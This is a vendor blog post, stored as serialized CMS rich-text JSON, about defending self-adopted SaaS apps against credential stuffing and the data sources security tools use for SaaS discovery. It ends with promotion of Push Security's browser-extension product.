you’re:",[],{},{"nodeType":250,"data":308282,"content":308283},{},[308284,308293,308302,308311],{"nodeType":254,"data":308285,"content":308286},{},[308287],{"nodeType":178,"data":308288,"content":308289},{},[308290],{"nodeType":173,"value":300726,"marks":308291,"data":308292},[],{},{"nodeType":254,"data":308294,"content":308295},{},[308296],{"nodeType":178,"data":308297,"content":308298},{},[308299],{"nodeType":173,"value":300736,"marks":308300,"data":308301},[],{},{"nodeType":254,"data":308303,"content":308304},{},[308305],{"nodeType":178,"data":308306,"content":308307},{},[308308],{"nodeType":173,"value":300746,"marks":308309,"data":308310},[],{},{"nodeType":254,"data":308312,"content":308313},{},[308314],{"nodeType":178,"data":308315,"content":308316},{},[308317],{"nodeType":173,"value":300756,"marks":308318,"data":308319},[],{},{"nodeType":312,"data":308321,"content":308324},{"target":308322},{"sys":308323},{"id":300352,"type":317,"linkType":318},[],{"nodeType":178,"data":308326,"content":308327},{},[308328],{"nodeType":173,"value":308329,"marks":308330,"data":308331},"In contrast to SaaS apps like Office 365 or Salesforce that are extraordinarily configurable and often have teams managing and securing them, there’s some mixed news when it comes to self-adopted SaaS apps. The bad news is that many of these apps provide virtually no security features or configurable settings that can be hardened. The good news is that this means there is now very little work to do here. When they exist, configuration settings are typically around:",[],{},{"nodeType":250,"data":308333,"content":308334},{},[308335,308345],{"nodeType":254,"data":308336,"content":308337},{},[308338],{"nodeType":178,"data":308339,"content":308340},{},[308341],{"nodeType":173,"value":308342,"marks":308343,"data":308344},"Forcing the above controls for all users (e.g. force MFA)",[],{},{"nodeType":254,"data":308346,"content":308347},{},[308348],{"nodeType":178,"data":308349,"content":308350},{},[308351],{"nodeType":173,"value":308352,"marks":308353,"data":308354},"Configuring external or public-sharing settings",[],{},{"nodeType":178,"data":308356,"content":308357},{},[308358],{"nodeType":173,"value":308359,"marks":308360,"data":308361},"Finally, though not mentioned explicitly in the NCSC’s version of the shared-responsibility model, it’s worth remembering that things go wrong even if all the above is in place. That’s where security monitoring comes in. In practice, though, few self-adopted SaaS apps offer audit trails or similar options that can be integrated with SIEM infrastructure. However, you can monitor things like:",[],{},{"nodeType":250,"data":308363,"content":308364},{},[308365,308375],{"nodeType":254,"data":308366,"content":308367},{},[308368],{"nodeType":178,"data":308369,"content":308370},{},[308371],{"nodeType":173,"value":308372,"marks":308373,"data":308374},"Breached passwords in passwords dumps (think haveibeenpwned.com)",[],{},{"nodeType":254,"data":308376,"content":308377},{},[308378],{"nodeType":178,"data":308379,"content":308380},{},[308381],{"nodeType":173,"value":308382,"marks":308383,"data":308384},"Typical post-exploitation or persistence techniques (e.g. OAuth integrations or API keys being created, forwarding rules, etc.)",[],{},{"nodeType":178,"data":308386,"content":308387},{},[308388],{"nodeType":173,"value":308389,"marks":308390,"data":308391},"These are the controls that fall into that “easy to understand, easy to recommend, but pretty hard to do at scale” category. Very few organizations have account security controls in place across the bulk of SaaS apps, and especially the apps that were self-adopted. The reality is that most companies still don’t even know about those self-adopted apps. So where should we start?",[],{},{"nodeType":178,"data":308393,"content":308394},{},[308395],{"nodeType":173,"value":308396,"marks":308397,"data":308398},"I think the most sane approach is to avoid speculation and focus on the techniques that are actually being used to attack SaaS apps today. I’ll cut to the chase - it’s credential stuffing we need to prevent. ",[],{},{"nodeType":235,"data":308400,"content":308401},{},[308402],{"nodeType":173,"value":308403,"marks":308404,"data":308405},"Start with preventing credential stuffing",[],{},{"nodeType":178,"data":308407,"content":308408},{},[308409],{"nodeType":173,"value":308410,"marks":308411,"data":308412},"The most common attack against SaaS today is credential stuffing – where attackers use tools that automate the process of taking a list of breached passwords (from public password dumps or traded on underground crime marketplaces) and retargeting those credentials against different apps. ",[],{},{"nodeType":178,"data":308414,"content":308415},{},[308416],{"nodeType":173,"value":308417,"marks":308418,"data":308419},"Slightly more sophisticated attackers might even try expanding their targets by using marketing and advertising services to match private accounts to work accounts in case employees re-used similar passwords. In the example for acme.com in the graphic below, we see how this plays out to get access to a company’s MailChimp. At this point, attackers are able to start sending scam emails to your customers from your domain in emails that look completely legit. This type of attack where compromised SaaS apps are used to send customers malicious emails are something we’ve seen play out a few times recently:",[],{},{"nodeType":250,"data":308421,"content":308422},{},[308423,308445,308466,308488,308509],{"nodeType":254,"data":308424,"content":308425},{},[308426],{"nodeType":178,"data":308427,"content":308428},{},[308429,308433,308442],{"nodeType":173,"value":308430,"marks":308431,"data":308432},"In this ",[],{},{"nodeType":186,"data":308434,"content":308436},{"uri":308435},"https://www.bleepingcomputer.com/news/security/chipotle-s-marketing-account-hacked-to-send-phishing-emails/",[308437],{"nodeType":173,"value":308438,"marks":308439,"data":308441},"Chipotle attack",[308440],{"type":194},{},{"nodeType":173,"value":37,"marks":308443,"data":308444},[],{},{"nodeType":254,"data":308446,"content":308447},{},[308448],{"nodeType":178,"data":308449,"content":308450},{},[308451,308454,308463],{"nodeType":173,"value":308430,"marks":308452,"data":308453},[],{},{"nodeType":186,"data":308455,"content":308457},{"uri":308456},"https://www.bleepingcomputer.com/news/security/doordash-discloses-new-data-breach-tied-to-twilio-hackers/",[308458],{"nodeType":173,"value":308459,"marks":308460,"data":308462},"DoorDash attack",[308461],{"type":194},{},{"nodeType":173,"value":37,"marks":308464,"data":308465},[],{},{"nodeType":254,"data":308467,"content":308468},{},[308469],{"nodeType":178,"data":308470,"content":308471},{},[308472,308476,308485],{"nodeType":173,"value":308473,"marks":308474,"data":308475},"In this",[],{},{"nodeType":186,"data":308477,"content":308479},{"uri":308478},"https://www.bleepingcomputer.com/news/security/namecheaps-email-hacked-to-send-metamask-dhl-phishing-emails/",[308480],{"nodeType":173,"value":308481,"marks":308482,"data":308484}," attack against domain registrar NameCheap",[308483],{"type":194},{},{"nodeType":173,"value":37,"marks":308486,"data":308487},[],{},{"nodeType":254,"data":308489,"content":308490},{},[308491],{"nodeType":178,"data":308492,"content":308493},{},[308494,308497,308506],{"nodeType":173,"value":308430,"marks":308495,"data":308496},[],{},{"nodeType":186,"data":308498,"content":308500},{"uri":308499},"https://www.bleepingcomputer.com/news/security/hacked-sendgrid-accounts-used-in-phishing-attacks-to-steal-logins/",[308501],{"nodeType":173,"value":308502,"marks":308503,"data":308505},"SendGrid attack",[308504],{"type":194},{},{"nodeType":173,"value":37,"marks":308507,"data":308508},[],{},{"nodeType":254,"data":308510,"content":308511},{},[308512],{"nodeType":178,"data":308513,"content":308514},{},[308515,308518,308527],{"nodeType":173,"value":308430,"marks":308516,"data":308517},[],{},{"nodeType":186,"data":308519,"content":308521},{"uri":308520},"https://www.bleepingcomputer.com/news/security/mailchimp-discloses-new-breach-after-employees-got-hacked/",[308522],{"nodeType":173,"value":308523,"marks":308524,"data":308526},"MailChimp attack",[308525],{"type":194},{},{"nodeType":173,"value":37,"marks":308528,"data":308529},[],{},{"nodeType":312,"data":308531,"content":308534},{"target":308532},{"sys":308533},{"id":285904,"type":317,"linkType":318},[],{"nodeType":178,"data":308536,"content":308537},{},[308538],{"nodeType":173,"value":308539,"marks":308540,"data":308541},"PLG and the increase in employee-adopted apps has led to employees creating more accounts, on more apps and without the guiding hand of security to make sure strong identity and access controls are in place. ",[],{},{"nodeType":178,"data":308543,"content":308544},{},[308545],{"nodeType":173,"value":308546,"marks":308547,"data":308550},"Opportunistic attackers now have a huge, unmonitored attack surface to target using low effort/cost techniques that generate reliable results for them. ",[308548,308549],{"type":370},{"type":1646},{},{"nodeType":235,"data":308552,"content":308553},{},[308554],{"nodeType":173,"value":308555,"marks":308556,"data":308557},"Why SSO is not the answer to our SaaS account security prayers",[],{},{"nodeType":178,"data":308559,"content":308560},{},[308561],{"nodeType":173,"value":308562,"marks":308563,"data":308564},"Many security teams are leaning on SSO to address this issue. They’ll require that apps used in their company use SSO, specifically SAML (Security Assertion Markup Language) before they can be approved or used. This works really, really well for the apps that provide this functionality. It’s the gold standard for authentication. ",[],{},{"nodeType":178,"data":308566,"content":308567},{},[308568],{"nodeType":173,"value":308569,"marks":308570,"data":308571},"With SAML SSO, there’s just one account, just one password, and you can centrally deprovision accounts when employees leave the organization. In fact, you’re probably already paying for a SAML IdP (Identity Provider) like Google Directory or Azure AD. Many others are using tools like Okta.   ",[],{},{"nodeType":178,"data":308573,"content":308574},{},[308575],{"nodeType":173,"value":308576,"marks":308577,"data":308578},"There’s one obvious point we need to make here: SSO isn’t going to help you discover which apps employees are using. But, once you discover them and determine they support SAML, you can integrate them with your solution.",[],{},{"nodeType":178,"data":308580,"content":308581},{},[308582],{"nodeType":173,"value":308583,"marks":308584,"data":308585},"But here lies the problem…when we reviewed 500 of the most popular apps that Push supports, we found that: ",[],{},{"nodeType":235,"data":308587,"content":308588},{},[308589],{"nodeType":173,"value":308590,"marks":308591,"data":308592},"Only around 30% of apps offer SSO and, of those, very few make it available on their lower-priced tiers.",[],{},{"nodeType":312,"data":308594,"content":308597},{"target":308595},{"sys":308596},{"id":286240,"type":317,"linkType":318},[],{"nodeType":178,"data":308599,"content":308600},{},[308601],{"nodeType":173,"value":308602,"marks":308603,"data":308604},"We also noticed that the more modern, newer apps were less likely to offer SAML support than the larger, more established business apps. So if your strategy is to block access to any app that doesn’t offer SSO integrations, you’re going to have to block the majority of self-adopted apps your employees are using. ",[],{},{"nodeType":178,"data":308606,"content":308607},{},[308608],{"nodeType":173,"value":308609,"marks":308610,"data":308611},"There are some other complications and nuances around SAML. Sometimes the SAML integration will only cover one tenant or instance and not the entire app. In this case, every time you find a new workspace or instance, you need to integrate it again. Worse, you can often only integrate one workspace or instance with your SAML IdP. ",[],{},{"nodeType":178,"data":308613,"content":308614},{},[308615,308619,308626],{"nodeType":173,"value":308616,"marks":308617,"data":308618},"Then there’s the ethically dubious issue of “",[],{},{"nodeType":186,"data":308620,"content":308621},{"uri":27492},[308622],{"nodeType":173,"value":4475,"marks":308623,"data":308625},[308624],{"type":194},{},{"nodeType":173,"value":308627,"marks":308628,"data":308629},"” where vendors that do offer SSO reserve it only for their enterprise tiers designed for organizations buying huge volumes of licenses, which makes this impractical for many if not most of us.",[],{},{"nodeType":235,"data":308631,"content":308632},{},[308633],{"nodeType":173,"value":308634,"marks":308635,"data":308636},"A game plan for preventing credential stuffing",[],{},{"nodeType":178,"data":308638,"content":308639},{},[308640],{"nodeType":173,"value":308641,"marks":308642,"data":308643},"I like the idea of going passwordless as much as the next security person, but that’s not practical for many apps right now. So we’re going to rely on passwords as well, at least for the foreseeable future. Strong, unique passwords, coupled with MFA, are very effective identity and access controls, so it’s not the end of the world.",[],{},{"nodeType":178,"data":308645,"content":308646},{},[308647],{"nodeType":173,"value":308648,"marks":308649,"data":308650},"To prevent credential stuffing attacks (and a whole host of other attacks to boot) you will need to implement the following controls:",[],{},{"nodeType":312,"data":308652,"content":308655},{"target":308653},{"sys":308654},{"id":286302,"type":317,"linkType":318},[],{"nodeType":178,"data":308657,"content":308658},{},[308659],{"nodeType":173,"value":308660,"marks":308661,"data":308662},"It’s useful to note from the requirements that you must be in a position to discover SaaS apps being onboarded, but also discover how these apps are accessed.",[],{},{"nodeType":178,"data":308664,"content":308665},{},[308666],{"nodeType":173,"value":308667,"marks":308668,"data":308669},"There’s only one place where we can get data about who is using which SaaS apps, as well as the ability to inspect passwords and check MFA status for each user. And that’s in the employee’s browsers.",[],{},{"nodeType":178,"data":308671,"content":308672},{},[308673],{"nodeType":173,"value":286343,"marks":308674,"data":308675},[],{},{"nodeType":250,"data":308677,"content":308678},{},[308679,308689,308699],{"nodeType":254,"data":308680,"content":308681},{},[308682],{"nodeType":178,"data":308683,"content":308684},{},[308685],{"nodeType":173,"value":308686,"marks":308687,"data":308688},"Observe username and password logins, ",[],{},{"nodeType":254,"data":308690,"content":308691},{},[308692],{"nodeType":178,"data":308693,"content":308694},{},[308695],{"nodeType":173,"value":308696,"marks":308697,"data":308698},"Assess their strength and whether they are being shared or reused, and ",[],{},{"nodeType":254,"data":308700,"content":308701},{},[308702],{"nodeType":178,"data":308703,"content":308704},{},[308705],{"nodeType":173,"value":286386,"marks":308706,"data":308707},[],{},{"nodeType":178,"data":308709,"content":308710},{},[308711],{"nodeType":173,"value":308712,"marks":308713,"data":308714},"More on that in a moment, but first, the last piece of advice:",[],{},{"nodeType":169,"data":308716,"content":308717},{},[308718],{"nodeType":173,"value":308719,"marks":308720,"data":308721},"Tackle risk assessment and account security in parallel",[],{},{"nodeType":178,"data":308723,"content":308724},{},[308725],{"nodeType":173,"value":308726,"marks":308727,"data":308728},"Quite often when I talk to security leaders, they’re fixated on supply chain risk and the risk of account compromise is an afterthought. This is understandable - these are the attacks that are widely reported, and require high-level decision making, so this feels like the natural first step. They’re aware that employees are using unvetted apps, but they don’t feel like they’re in a position to secure the employee account until they have identified and vetted all the apps in use. ",[],{},{"nodeType":178,"data":308730,"content":308731},{},[308732],{"nodeType":173,"value":308733,"marks":308734,"data":308735},"It seems logical to want to approve apps first and then secure the accounts. It might make sense if you are starting from zero, however, when organizations get visibility of SaaS apps in use, they usually see hundreds on the list that employees are already using. In this case, waiting to get through the entire backlog of app risk assessment first is counter productive. Regardless of whether an app is approved yet, if it’s in use there is the risk of an attacker compromising a weak employee account with a credential stuffing attack, which is arguably a greater risk than a SaaS vendor being compromised in a supply chain attack. That’s because attacks against employee SaaS accounts are more common, just reported less often than supply chain attacks.",[],{},{"nodeType":178,"data":308737,"content":308738},{},[308739],{"nodeType":173,"value":308740,"marks":308741,"data":308742},"The best way to bring down as much SaaS risk as quickly as possible is to tackle both streams independently and in parallel. But to do this, you need the right tools.  ",[],{},{"nodeType":178,"data":308744,"content":308745},{},[308746],{"nodeType":173,"value":308747,"marks":308748,"data":308749},"Push collects usage data from the same place we collect account security data so we can also identify password and MFA data about the employee’s SaaS account. We don’t require you to integrate Push with each app you discover. Instead, usage and security data are collected at the same time we’re discovering the app because we’re using a browser extension. The extension gives us relevant security context so you can address both risks together. On that note, let’s dig into the data that SaaS security tools use.",[],{},{"nodeType":169,"data":308751,"content":308752},{},[308753],{"nodeType":173,"value":308754,"marks":308755,"data":308756},"Choose the right data source",[],{},{"nodeType":178,"data":308758,"content":308759},{},[308760],{"nodeType":173,"value":308761,"marks":308762,"data":308763},"Since we’ve moved from a world in which we as security teams got visibility through process (IT or procurement) to a world where we rely on technology to give us that visibility (for e.g. self-adopted apps) - we’re going to need tooling, and that’s where things get complicated.",[],{},{"nodeType":178,"data":308765,"content":308766},{},[308767],{"nodeType":173,"value":308768,"marks":308769,"data":308770},"The list of SaaS security product categories and tools is growing almost weekly, from Cloud Access Security Broker (CASBs), Security Service Edge (SSEs), SaaS Security Posture Management (SSPMs) and any number of other new buzzwords. The only thing growing faster is the promises they make, so it’s no surprise that it’s very difficult to identify solutions that can actually deliver what’s required.",[],{},{"nodeType":178,"data":308772,"content":308773},{},[308774],{"nodeType":173,"value":308775,"marks":308776,"data":308777},"One critical factor to consider when choosing tooling is the data that these tools build on. The requirements we’ve identified for doing SaaS security in the previous section are that we need to be able to:",[],{},{"nodeType":250,"data":308779,"content":308780},{},[308781,308791,308801,308811],{"nodeType":254,"data":308782,"content":308783},{},[308784],{"nodeType":178,"data":308785,"content":308786},{},[308787],{"nodeType":173,"value":308788,"marks":308789,"data":308790},"Discover new SaaS apps being adopted (and self-adopted).",[],{},{"nodeType":254,"data":308792,"content":308793},{},[308794],{"nodeType":178,"data":308795,"content":308796},{},[308797],{"nodeType":173,"value":308798,"marks":308799,"data":308800},"Keep a low rate of false positives, in other words we need to be able to tell the difference between, for example, accessing a SaaS app website or actually login into the app.",[],{},{"nodeType":254,"data":308802,"content":308803},{},[308804],{"nodeType":178,"data":308805,"content":308806},{},[308807],{"nodeType":173,"value":308808,"marks":308809,"data":308810},"Get insight into the identities or accounts used to access these apps - we need to know which users are authenticating to these apps and how (SSO, Social Logins, Local passwords)",[],{},{"nodeType":254,"data":308812,"content":308813},{},[308814],{"nodeType":178,"data":308815,"content":308816},{},[308817],{"nodeType":173,"value":308818,"marks":308819,"data":308820},"Identify account security issues such as disabled MFA, weak, reused and breached passwords.",[],{},{"nodeType":178,"data":308822,"content":308823},{},[308824],{"nodeType":173,"value":308825,"marks":308826,"data":308827},"The following is a summary of the most common data sources SaaS security tools are built on, and how they stack up in terms of the requirements above:",[],{},{"nodeType":312,"data":308829,"content":308833},{"target":308830},{"sys":308831},{"id":308832,"type":317,"linkType":318},"E8ThSCqbNNa9nggaKE3p1",[],{"nodeType":178,"data":308835,"content":308836},{},[308837,308841,308851],{"nodeType":173,"value":308838,"marks":308839,"data":308840},"Each data source has pros and cons, but let’s take a look at the most common sources to see what the high-level trade-offs are. We’ve got a short ",[],{},{"nodeType":1698,"data":308842,"content":308845},{"target":308843},{"sys":308844},{"id":282056,"type":317,"linkType":318},[308846],{"nodeType":173,"value":308847,"marks":308848,"data":308850},"blog post ",[308849],{"type":194},{},{"nodeType":173,"value":308852,"marks":308853,"data":308854},"on this topic if you want to share with your teammates and peers.",[],{},{"nodeType":235,"data":308856,"content":308857},{},[308858],{"nodeType":173,"value":308859,"marks":308860,"data":308861},"Financial records",[],{},{"nodeType":178,"data":308863,"content":308864},{},[308865],{"nodeType":173,"value":308866,"marks":308867,"data":308868},"Looking through invoices can provide some visibility into paid SaaS apps, which is why it has a very low false positive rate. However, there are blind spots - you won’t see any free tier or trial accounts, nor will you get any useful business context about who’s using it, how they’re using it, if logins are secure, and what data it has access to. That said, it’s a quick and dirty way to get a partial view of SaaS usage and might be the best place to start. ",[],{},{"nodeType":178,"data":308870,"content":308871},{},[308872],{"nodeType":173,"value":308873,"marks":308874,"data":308875},"The main downside of using finance as a data source is that it will discover apps very slowly, most apps will only move to a paid tier once employees have already been using the app for a while on free-tier and have become reliant enough on it that they need additional features or users. This is often too late to steer these users to a different app if there are critical risks identified with the app or vendor.",[],{},{"nodeType":235,"data":308877,"content":308878},{},[308879],{"nodeType":173,"value":308880,"marks":308881,"data":308882},"Email analytics",[],{},{"nodeType":178,"data":308884,"content":308885},{},[308886],{"nodeType":173,"value":308887,"marks":308888,"data":308889},"You can look at all the emails every employee receives and match these emails to different SaaS apps and vendors and based on that information make some statistical guesses about which employees are using which apps. This improves on finance records in a significant metric - speed of detection, but the trade-off is a high rate of false positives. One aspect that email detection is great for that isn’t included in the table is the ability to detect historic SaaS apps.",[],{},{"nodeType":178,"data":308891,"content":308892},{},[308893],{"nodeType":173,"value":308894,"marks":308895,"data":308896},"Unfortunately, except for some very limited edge cases it’s not possible to broadly detect account security issues using email, so at best this is a first-step data source.",[],{},{"nodeType":235,"data":308898,"content":308899},{},[308900],{"nodeType":173,"value":308901,"marks":308902,"data":308903},"Network data",[],{},{"nodeType":178,"data":308905,"content":308906},{},[308907],{"nodeType":173,"value":308908,"marks":308909,"data":308910},"This is the old-school approach that tools like CASBs use to do SaaS discovery, taking data from edge devices like firewalls, proxies, or DNS relays. This makes it very difficult to implement for companies that are distributed and cloud-native. There are now solutions that are more appropriate for distributed teams that work either by collecting network data from the endpoint with an agent, or perhaps your organization is very office-based and has excellent network telemetry - in which case these solutions might be easier to deploy.",[],{},{"nodeType":178,"data":308912,"content":308913},{},[308914],{"nodeType":173,"value":308915,"marks":308916,"data":308917},"While network data is relatively well understood, it’s not a great source for discovering SaaS use (as opposed to detecting when an employee simply accesses SaaS app websites - false positives galore) or for finding account security issues. It’s useful to get an idea of which apps might be used and indications on who might be using the app. But network data doesn’t provide the level of detail needed to discover account security issues. This is why CASB solutions have almost all started including API integrations to augment this data and make it useful - though this has its own problems.",[],{},{"nodeType":178,"data":308919,"content":308920},{},[308921],{"nodeType":173,"value":308922,"marks":308923,"data":308924},"If you’re looking to get a quick outline of which SaaS may be in use, a finance or email-based solution would likely be much easier to deploy and more cost effective. If you want to discover and remediate problems and actually reduce SaaS risk, you need to look elsewhere.",[],{},{"nodeType":235,"data":308926,"content":308927},{},[308928],{"nodeType":173,"value":308929,"marks":308930,"data":308931},"Application API data",[],{},{"nodeType":178,"data":308933,"content":308934},{},[308935],{"nodeType":173,"value":308936,"marks":308937,"data":308938},"Many of the more established SaaS apps (especially those that are almost Platform-as-a-Service or PaaS) like 365, Salesforce, Slack, Github etc. offer APIs that expose security-relevant data. However, for apps that do support these APIs, this is an amazing data source that typically provides the ability to extract user-lists or check account security controls like MFA are enabled for all users, or list third-party integrations. Audit log feeds also provide a useful data source for ingestion into SIEM systems. ",[],{},{"nodeType":178,"data":308940,"content":308941},{},[308942],{"nodeType":173,"value":308943,"marks":308944,"data":308945},"However, APIs as a data source for doing SaaS security has 2 major limitations:",[],{},{"nodeType":246189,"data":308947,"content":308948},{},[308949,308968],{"nodeType":254,"data":308950,"content":308951},{},[308952],{"nodeType":178,"data":308953,"content":308954},{},[308955,308959,308964],{"nodeType":173,"value":308956,"marks":308957,"data":308958},"No discovery features. ",[],{},{"nodeType":173,"value":308960,"marks":308961,"data":308963},"You must already know that an app is in use",[308962],{"type":370},{},{"nodeType":173,"value":308965,"marks":308966,"data":308967}," (or more specifically know about every app tenant in use) before you can integrate it with your SaaS security solutions (typically SSPM tools). This means you need some other data source to discover SaaS apps and tenants.",[],{},{"nodeType":254,"data":308969,"content":308970},{},[308971],{"nodeType":178,"data":308972,"content":308973},{},[308974,308978,308983],{"nodeType":173,"value":308975,"marks":308976,"data":308977},"Lack of support. These APIs are typically available ",[],{},{"nodeType":173,"value":308979,"marks":308980,"data":308982},"only for “core” SaaS platforms",[308981],{"type":370},{},{"nodeType":173,"value":308984,"marks":308985,"data":308986},", and a very small minority of the types of SaaS apps employees might self-adopt will other these security monitoring integrations.",[],{},{"nodeType":235,"data":308988,"content":308989},{},[308990],{"nodeType":173,"value":18538,"marks":308991,"data":308992},[],{},{"nodeType":178,"data":308994,"content":308995},{},[308996],{"nodeType":173,"value":308997,"marks":308998,"data":308999},"The idea behind using browser extensions for SaaS security is simple: if all the data you care about monitoring exists in your employees’ browsers, let’s analyze the data in the browser. Browser extensions allow you to deeply inspect users' interactions with SaaS apps. This means you can get close to perfect accuracy in terms of discovering which apps are in-use (vs browser the website) because you can actually observe the login process directly. ",[],{},{"nodeType":178,"data":309001,"content":309002},{},[309003,309007,309012],{"nodeType":173,"value":309004,"marks":309005,"data":309006},"Since you observe the login process with the extension, it’s easy to discover account security issues like weak passwords or missing MFA. You can also tell when employees are logging into apps without using SSO. Best of all you don’t need to create a dragnet and collect all this data centrally creating a privacy nightmare, instead ",[],{},{"nodeType":173,"value":309008,"marks":309009,"data":309011},"you can analyze this data where it already exists, inside the safe confines of the browser sandbox",[309010],{"type":370},{},{"nodeType":173,"value":309013,"marks":309014,"data":309015},". The only data you report out is a flag when you find an issue.",[],{},{"nodeType":178,"data":309017,"content":309018},{},[309019,309023,309028],{"nodeType":173,"value":309020,"marks":309021,"data":309022},"Another benefit of browser extensions is that they are not passive. ",[],{},{"nodeType":173,"value":309024,"marks":309025,"data":309027},"You can easily add active features to extensions that do things like warn users before they even set bad passwords",[309026],{"type":370},{},{"nodeType":173,"value":309029,"marks":309030,"data":309031}," - preventing these issues from occurring in the first place.",[],{},{"nodeType":178,"data":309033,"content":309034},{},[309035],{"nodeType":173,"value":309036,"marks":309037,"data":309038},"The downside is that you need to deploy these browser extensions to employees. This used to be a much bigger issue in the past, but these days it’s easy to deploy extensions to your whole fleet of Chrome, Edge, Firefox, Safari, Brave and Opera browsers using an MDM or GPO policy. Another nice thing about extensions, is that unlike endpoint agents, extensions are cross platform (they don’t care if you are on Windows, Mac or Linux), are isolated to the browser and automatically update through the browser extension store.",[],{},{"nodeType":178,"data":309040,"content":309041},{},[309042],{"nodeType":173,"value":309043,"marks":309044,"data":309045},"I’m sure I’m not doing a great job of hiding my enthusiasm for browser extensions as a platform to build SaaS security tools on, but they truly do provide the kind of fast, accurate and detailed data we need to solve both the supply-chain and customer responsibility sides of SaaS security.",[],{},{"nodeType":235,"data":309047,"content":309048},{},[309049],{"nodeType":173,"value":309050,"marks":309051,"data":309052},"Push uses a browser extension and APIs ",[],{},{"nodeType":178,"data":309054,"content":309055},{},[309056],{"nodeType":173,"value":309057,"marks":309058,"data":309059},"That’s why we decided to build Push on a browser extension. To discover and provide security-relevant data about the integrations to your core cloud platforms, we also use APIs. Together, these two data sources provided a full view of the SaaS apps employees are using.",[],{},{"nodeType":169,"data":309061,"content":309062},{},[309063],{"nodeType":173,"value":309064,"marks":309065,"data":309066},"How can Push help?",[],{},{"nodeType":178,"data":309068,"content":309069},{},[309070],{"nodeType":173,"value":273308,"marks":309071,"data":309072},[],{},{"nodeType":178,"data":309074,"content":309075},{},[309076],{"nodeType":173,"value":309077,"marks":309078,"data":309079},"Here’s a quick rundown of how Push can help you:",[],{},{"nodeType":235,"data":309081,"content":309082},{},[309083],{"nodeType":173,"value":309084,"marks":309085,"data":309086},"Get visibility of shadow SaaS apps and unmanaged cloud accounts",[],{},{"nodeType":178,"data":309088,"content":309089},{},[309090],{"nodeType":173,"value":309091,"marks":309092,"data":309093},"If you’re going to get a handle on employee-adopted SaaS apps, you need to get visibility of them first. Push uses data from our browser extension to find SaaS apps that are logged into with usernames and passwords and SSO (OIDC). This gives you complete visibility of your SaaS environment, including shadow SaaS apps and cloud accounts that are not managed by IT. ",[],{},{"nodeType":312,"data":309095,"content":309099},{"target":309096},{"sys":309097},{"id":309098,"type":317,"linkType":318},"2PW9tNBBo0ohoqXYZ04kxA",[],{"nodeType":235,"data":309101,"content":309102},{},[309103],{"nodeType":173,"value":309104,"marks":309105,"data":309106},"Detect the new apps and integrations employees are adopting in real time",[],{},{"nodeType":178,"data":309108,"content":309109},{},[309110],{"nodeType":173,"value":309111,"marks":309112,"data":309113},"Push detects employees signing up to new apps, or integrating third-party apps to your core work platforms in real-time. That allows you to step in at the earliest opportunity to vet the app for critical issues and guide the employee through the appropriate app onboarding steps. This allows you to focus on the new stuff and buy yourself time as I recommended earlier. ",[],{},{"nodeType":312,"data":309115,"content":309118},{"target":309116},{"sys":309117},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":309120,"content":309121},{},[309122],{"nodeType":173,"value":309123,"marks":309124,"data":309125},"Avoid wasting time on false-positives",[],{},{"nodeType":178,"data":309127,"content":309128},{},[309129],{"nodeType":173,"value":282355,"marks":309130,"data":309131},[],{},{"nodeType":178,"data":309133,"content":309134},{},[309135],{"nodeType":173,"value":309136,"marks":309137,"data":309138},"Throughout this piece I’ve banged on about how critical it is to have the right data. Good data allows you to quickly and accurately identify new SaaS apps and integrations as employees adopt them. Good data is also required to identify the security issues that attackers can exploit to compromise your data through common attacks like Credential Stuffing. The best foundational data to lean on for SaaS visibility and risk is browser extension data.",[],{},{"nodeType":178,"data":309140,"content":309141},{},[309142],{"nodeType":173,"value":282399,"marks":309143,"data":309144},[],{},{"nodeType":178,"data":309146,"content":309147},{},[309148],{"nodeType":173,"value":309149,"marks":309150,"data":309153},"That makes Push the only SaaS security solution that can directly observe all SaaS use and the only solution that can identify account security issues across hundreds of apps - completely automatically. No need for API support, no need for an admin account. It just works.",[309151,309152],{"type":370},{"type":1646},{},{"nodeType":235,"data":309155,"content":309156},{},[309157],{"nodeType":173,"value":274547,"marks":309158,"data":309159},[],{},{"nodeType":178,"data":309161,"content":309162},{},[309163],{"nodeType":173,"value":309164,"marks":309165,"data":309166},"Supply chain risk is important, but I’d argue account compromise risks are greater for most organizations. Push can identify account security issues that make it possible for attackers to compromise your employees accounts using credential stuffing, brute forcing and phishing attacks. These include:",[],{},{"nodeType":250,"data":309168,"content":309169},{},[309170,309179,309188,309197,309206,309215],{"nodeType":254,"data":309171,"content":309172},{},[309173],{"nodeType":178,"data":309174,"content":309175},{},[309176],{"nodeType":173,"value":273418,"marks":309177,"data":309178},[],{},{"nodeType":254,"data":309180,"content":309181},{},[309182],{"nodeType":178,"data":309183,"content":309184},{},[309185],{"nodeType":173,"value":282464,"marks":309186,"data":309187},[],{},{"nodeType":254,"data":309189,"content":309190},{},[309191],{"nodeType":178,"data":309192,"content":309193},{},[309194],{"nodeType":173,"value":273438,"marks":309195,"data":309196},[],{},{"nodeType":254,"data":309198,"content":309199},{},[309200],{"nodeType":178,"data":309201,"content":309202},{},[309203],{"nodeType":173,"value":282483,"marks":309204,"data":309205},[],{},{"nodeType":254,"data":309207,"content":309208},{},[309209],{"nodeType":178,"data":309210,"content":309211},{},[309212],{"nodeType":173,"value":273458,"marks":309213,"data":309214},[],{},{"nodeType":254,"data":309216,"content":309217},{},[309218],{"nodeType":178,"data":309219,"content":309220},{},[309221],{"nodeType":173,"value":282502,"marks":309222,"data":309223},[],{},{"nodeType":312,"data":309225,"content":309228},{"target":309226},{"sys":309227},{"id":282509,"type":317,"linkType":318},[],{"nodeType":178,"data":309230,"content":309231},{},[309232],{"nodeType":173,"value":309233,"marks":309234,"data":309235},"We identify these issues at the same time we discover shadow SaaS apps, so you can tackle account compromise at the same time as supply chain risk to reduce your SaaS security risk exposure faster.",[],{},{"nodeType":178,"data":309237,"content":309238},{},[309239],{"nodeType":173,"value":309240,"marks":309241,"data":309242},"How do we actually reduce the risks? We engage employees directly via Slack or MS Teams, explain the account security issue we’ve identified in a way they’ll understand, and help them understand how it’s putting them and the business at risk. Then we guide them on how to fix it...",[],{},{"nodeType":312,"data":309244,"content":309247},{"target":309245},{"sys":309246},{"id":282536,"type":317,"linkType":318},[],{"nodeType":235,"data":309249,"content":309250},{},[309251],{"nodeType":173,"value":309252,"marks":309253,"data":309254},"Use Push to secure accounts that aren’t under SSO",[],{},{"nodeType":178,"data":309256,"content":309257},{},[309258],{"nodeType":173,"value":309259,"marks":309260,"data":309261},"In an ideal world, you could stick all your SaaS under your SSO solution, but we’ve already explained why that’s not practical for all apps. For apps and accounts that can’t use SSO, Push makes sure employees are using strong, unique passwords that aren’t published on a password breach list. We’ll also guide employees to use MFA when possible. 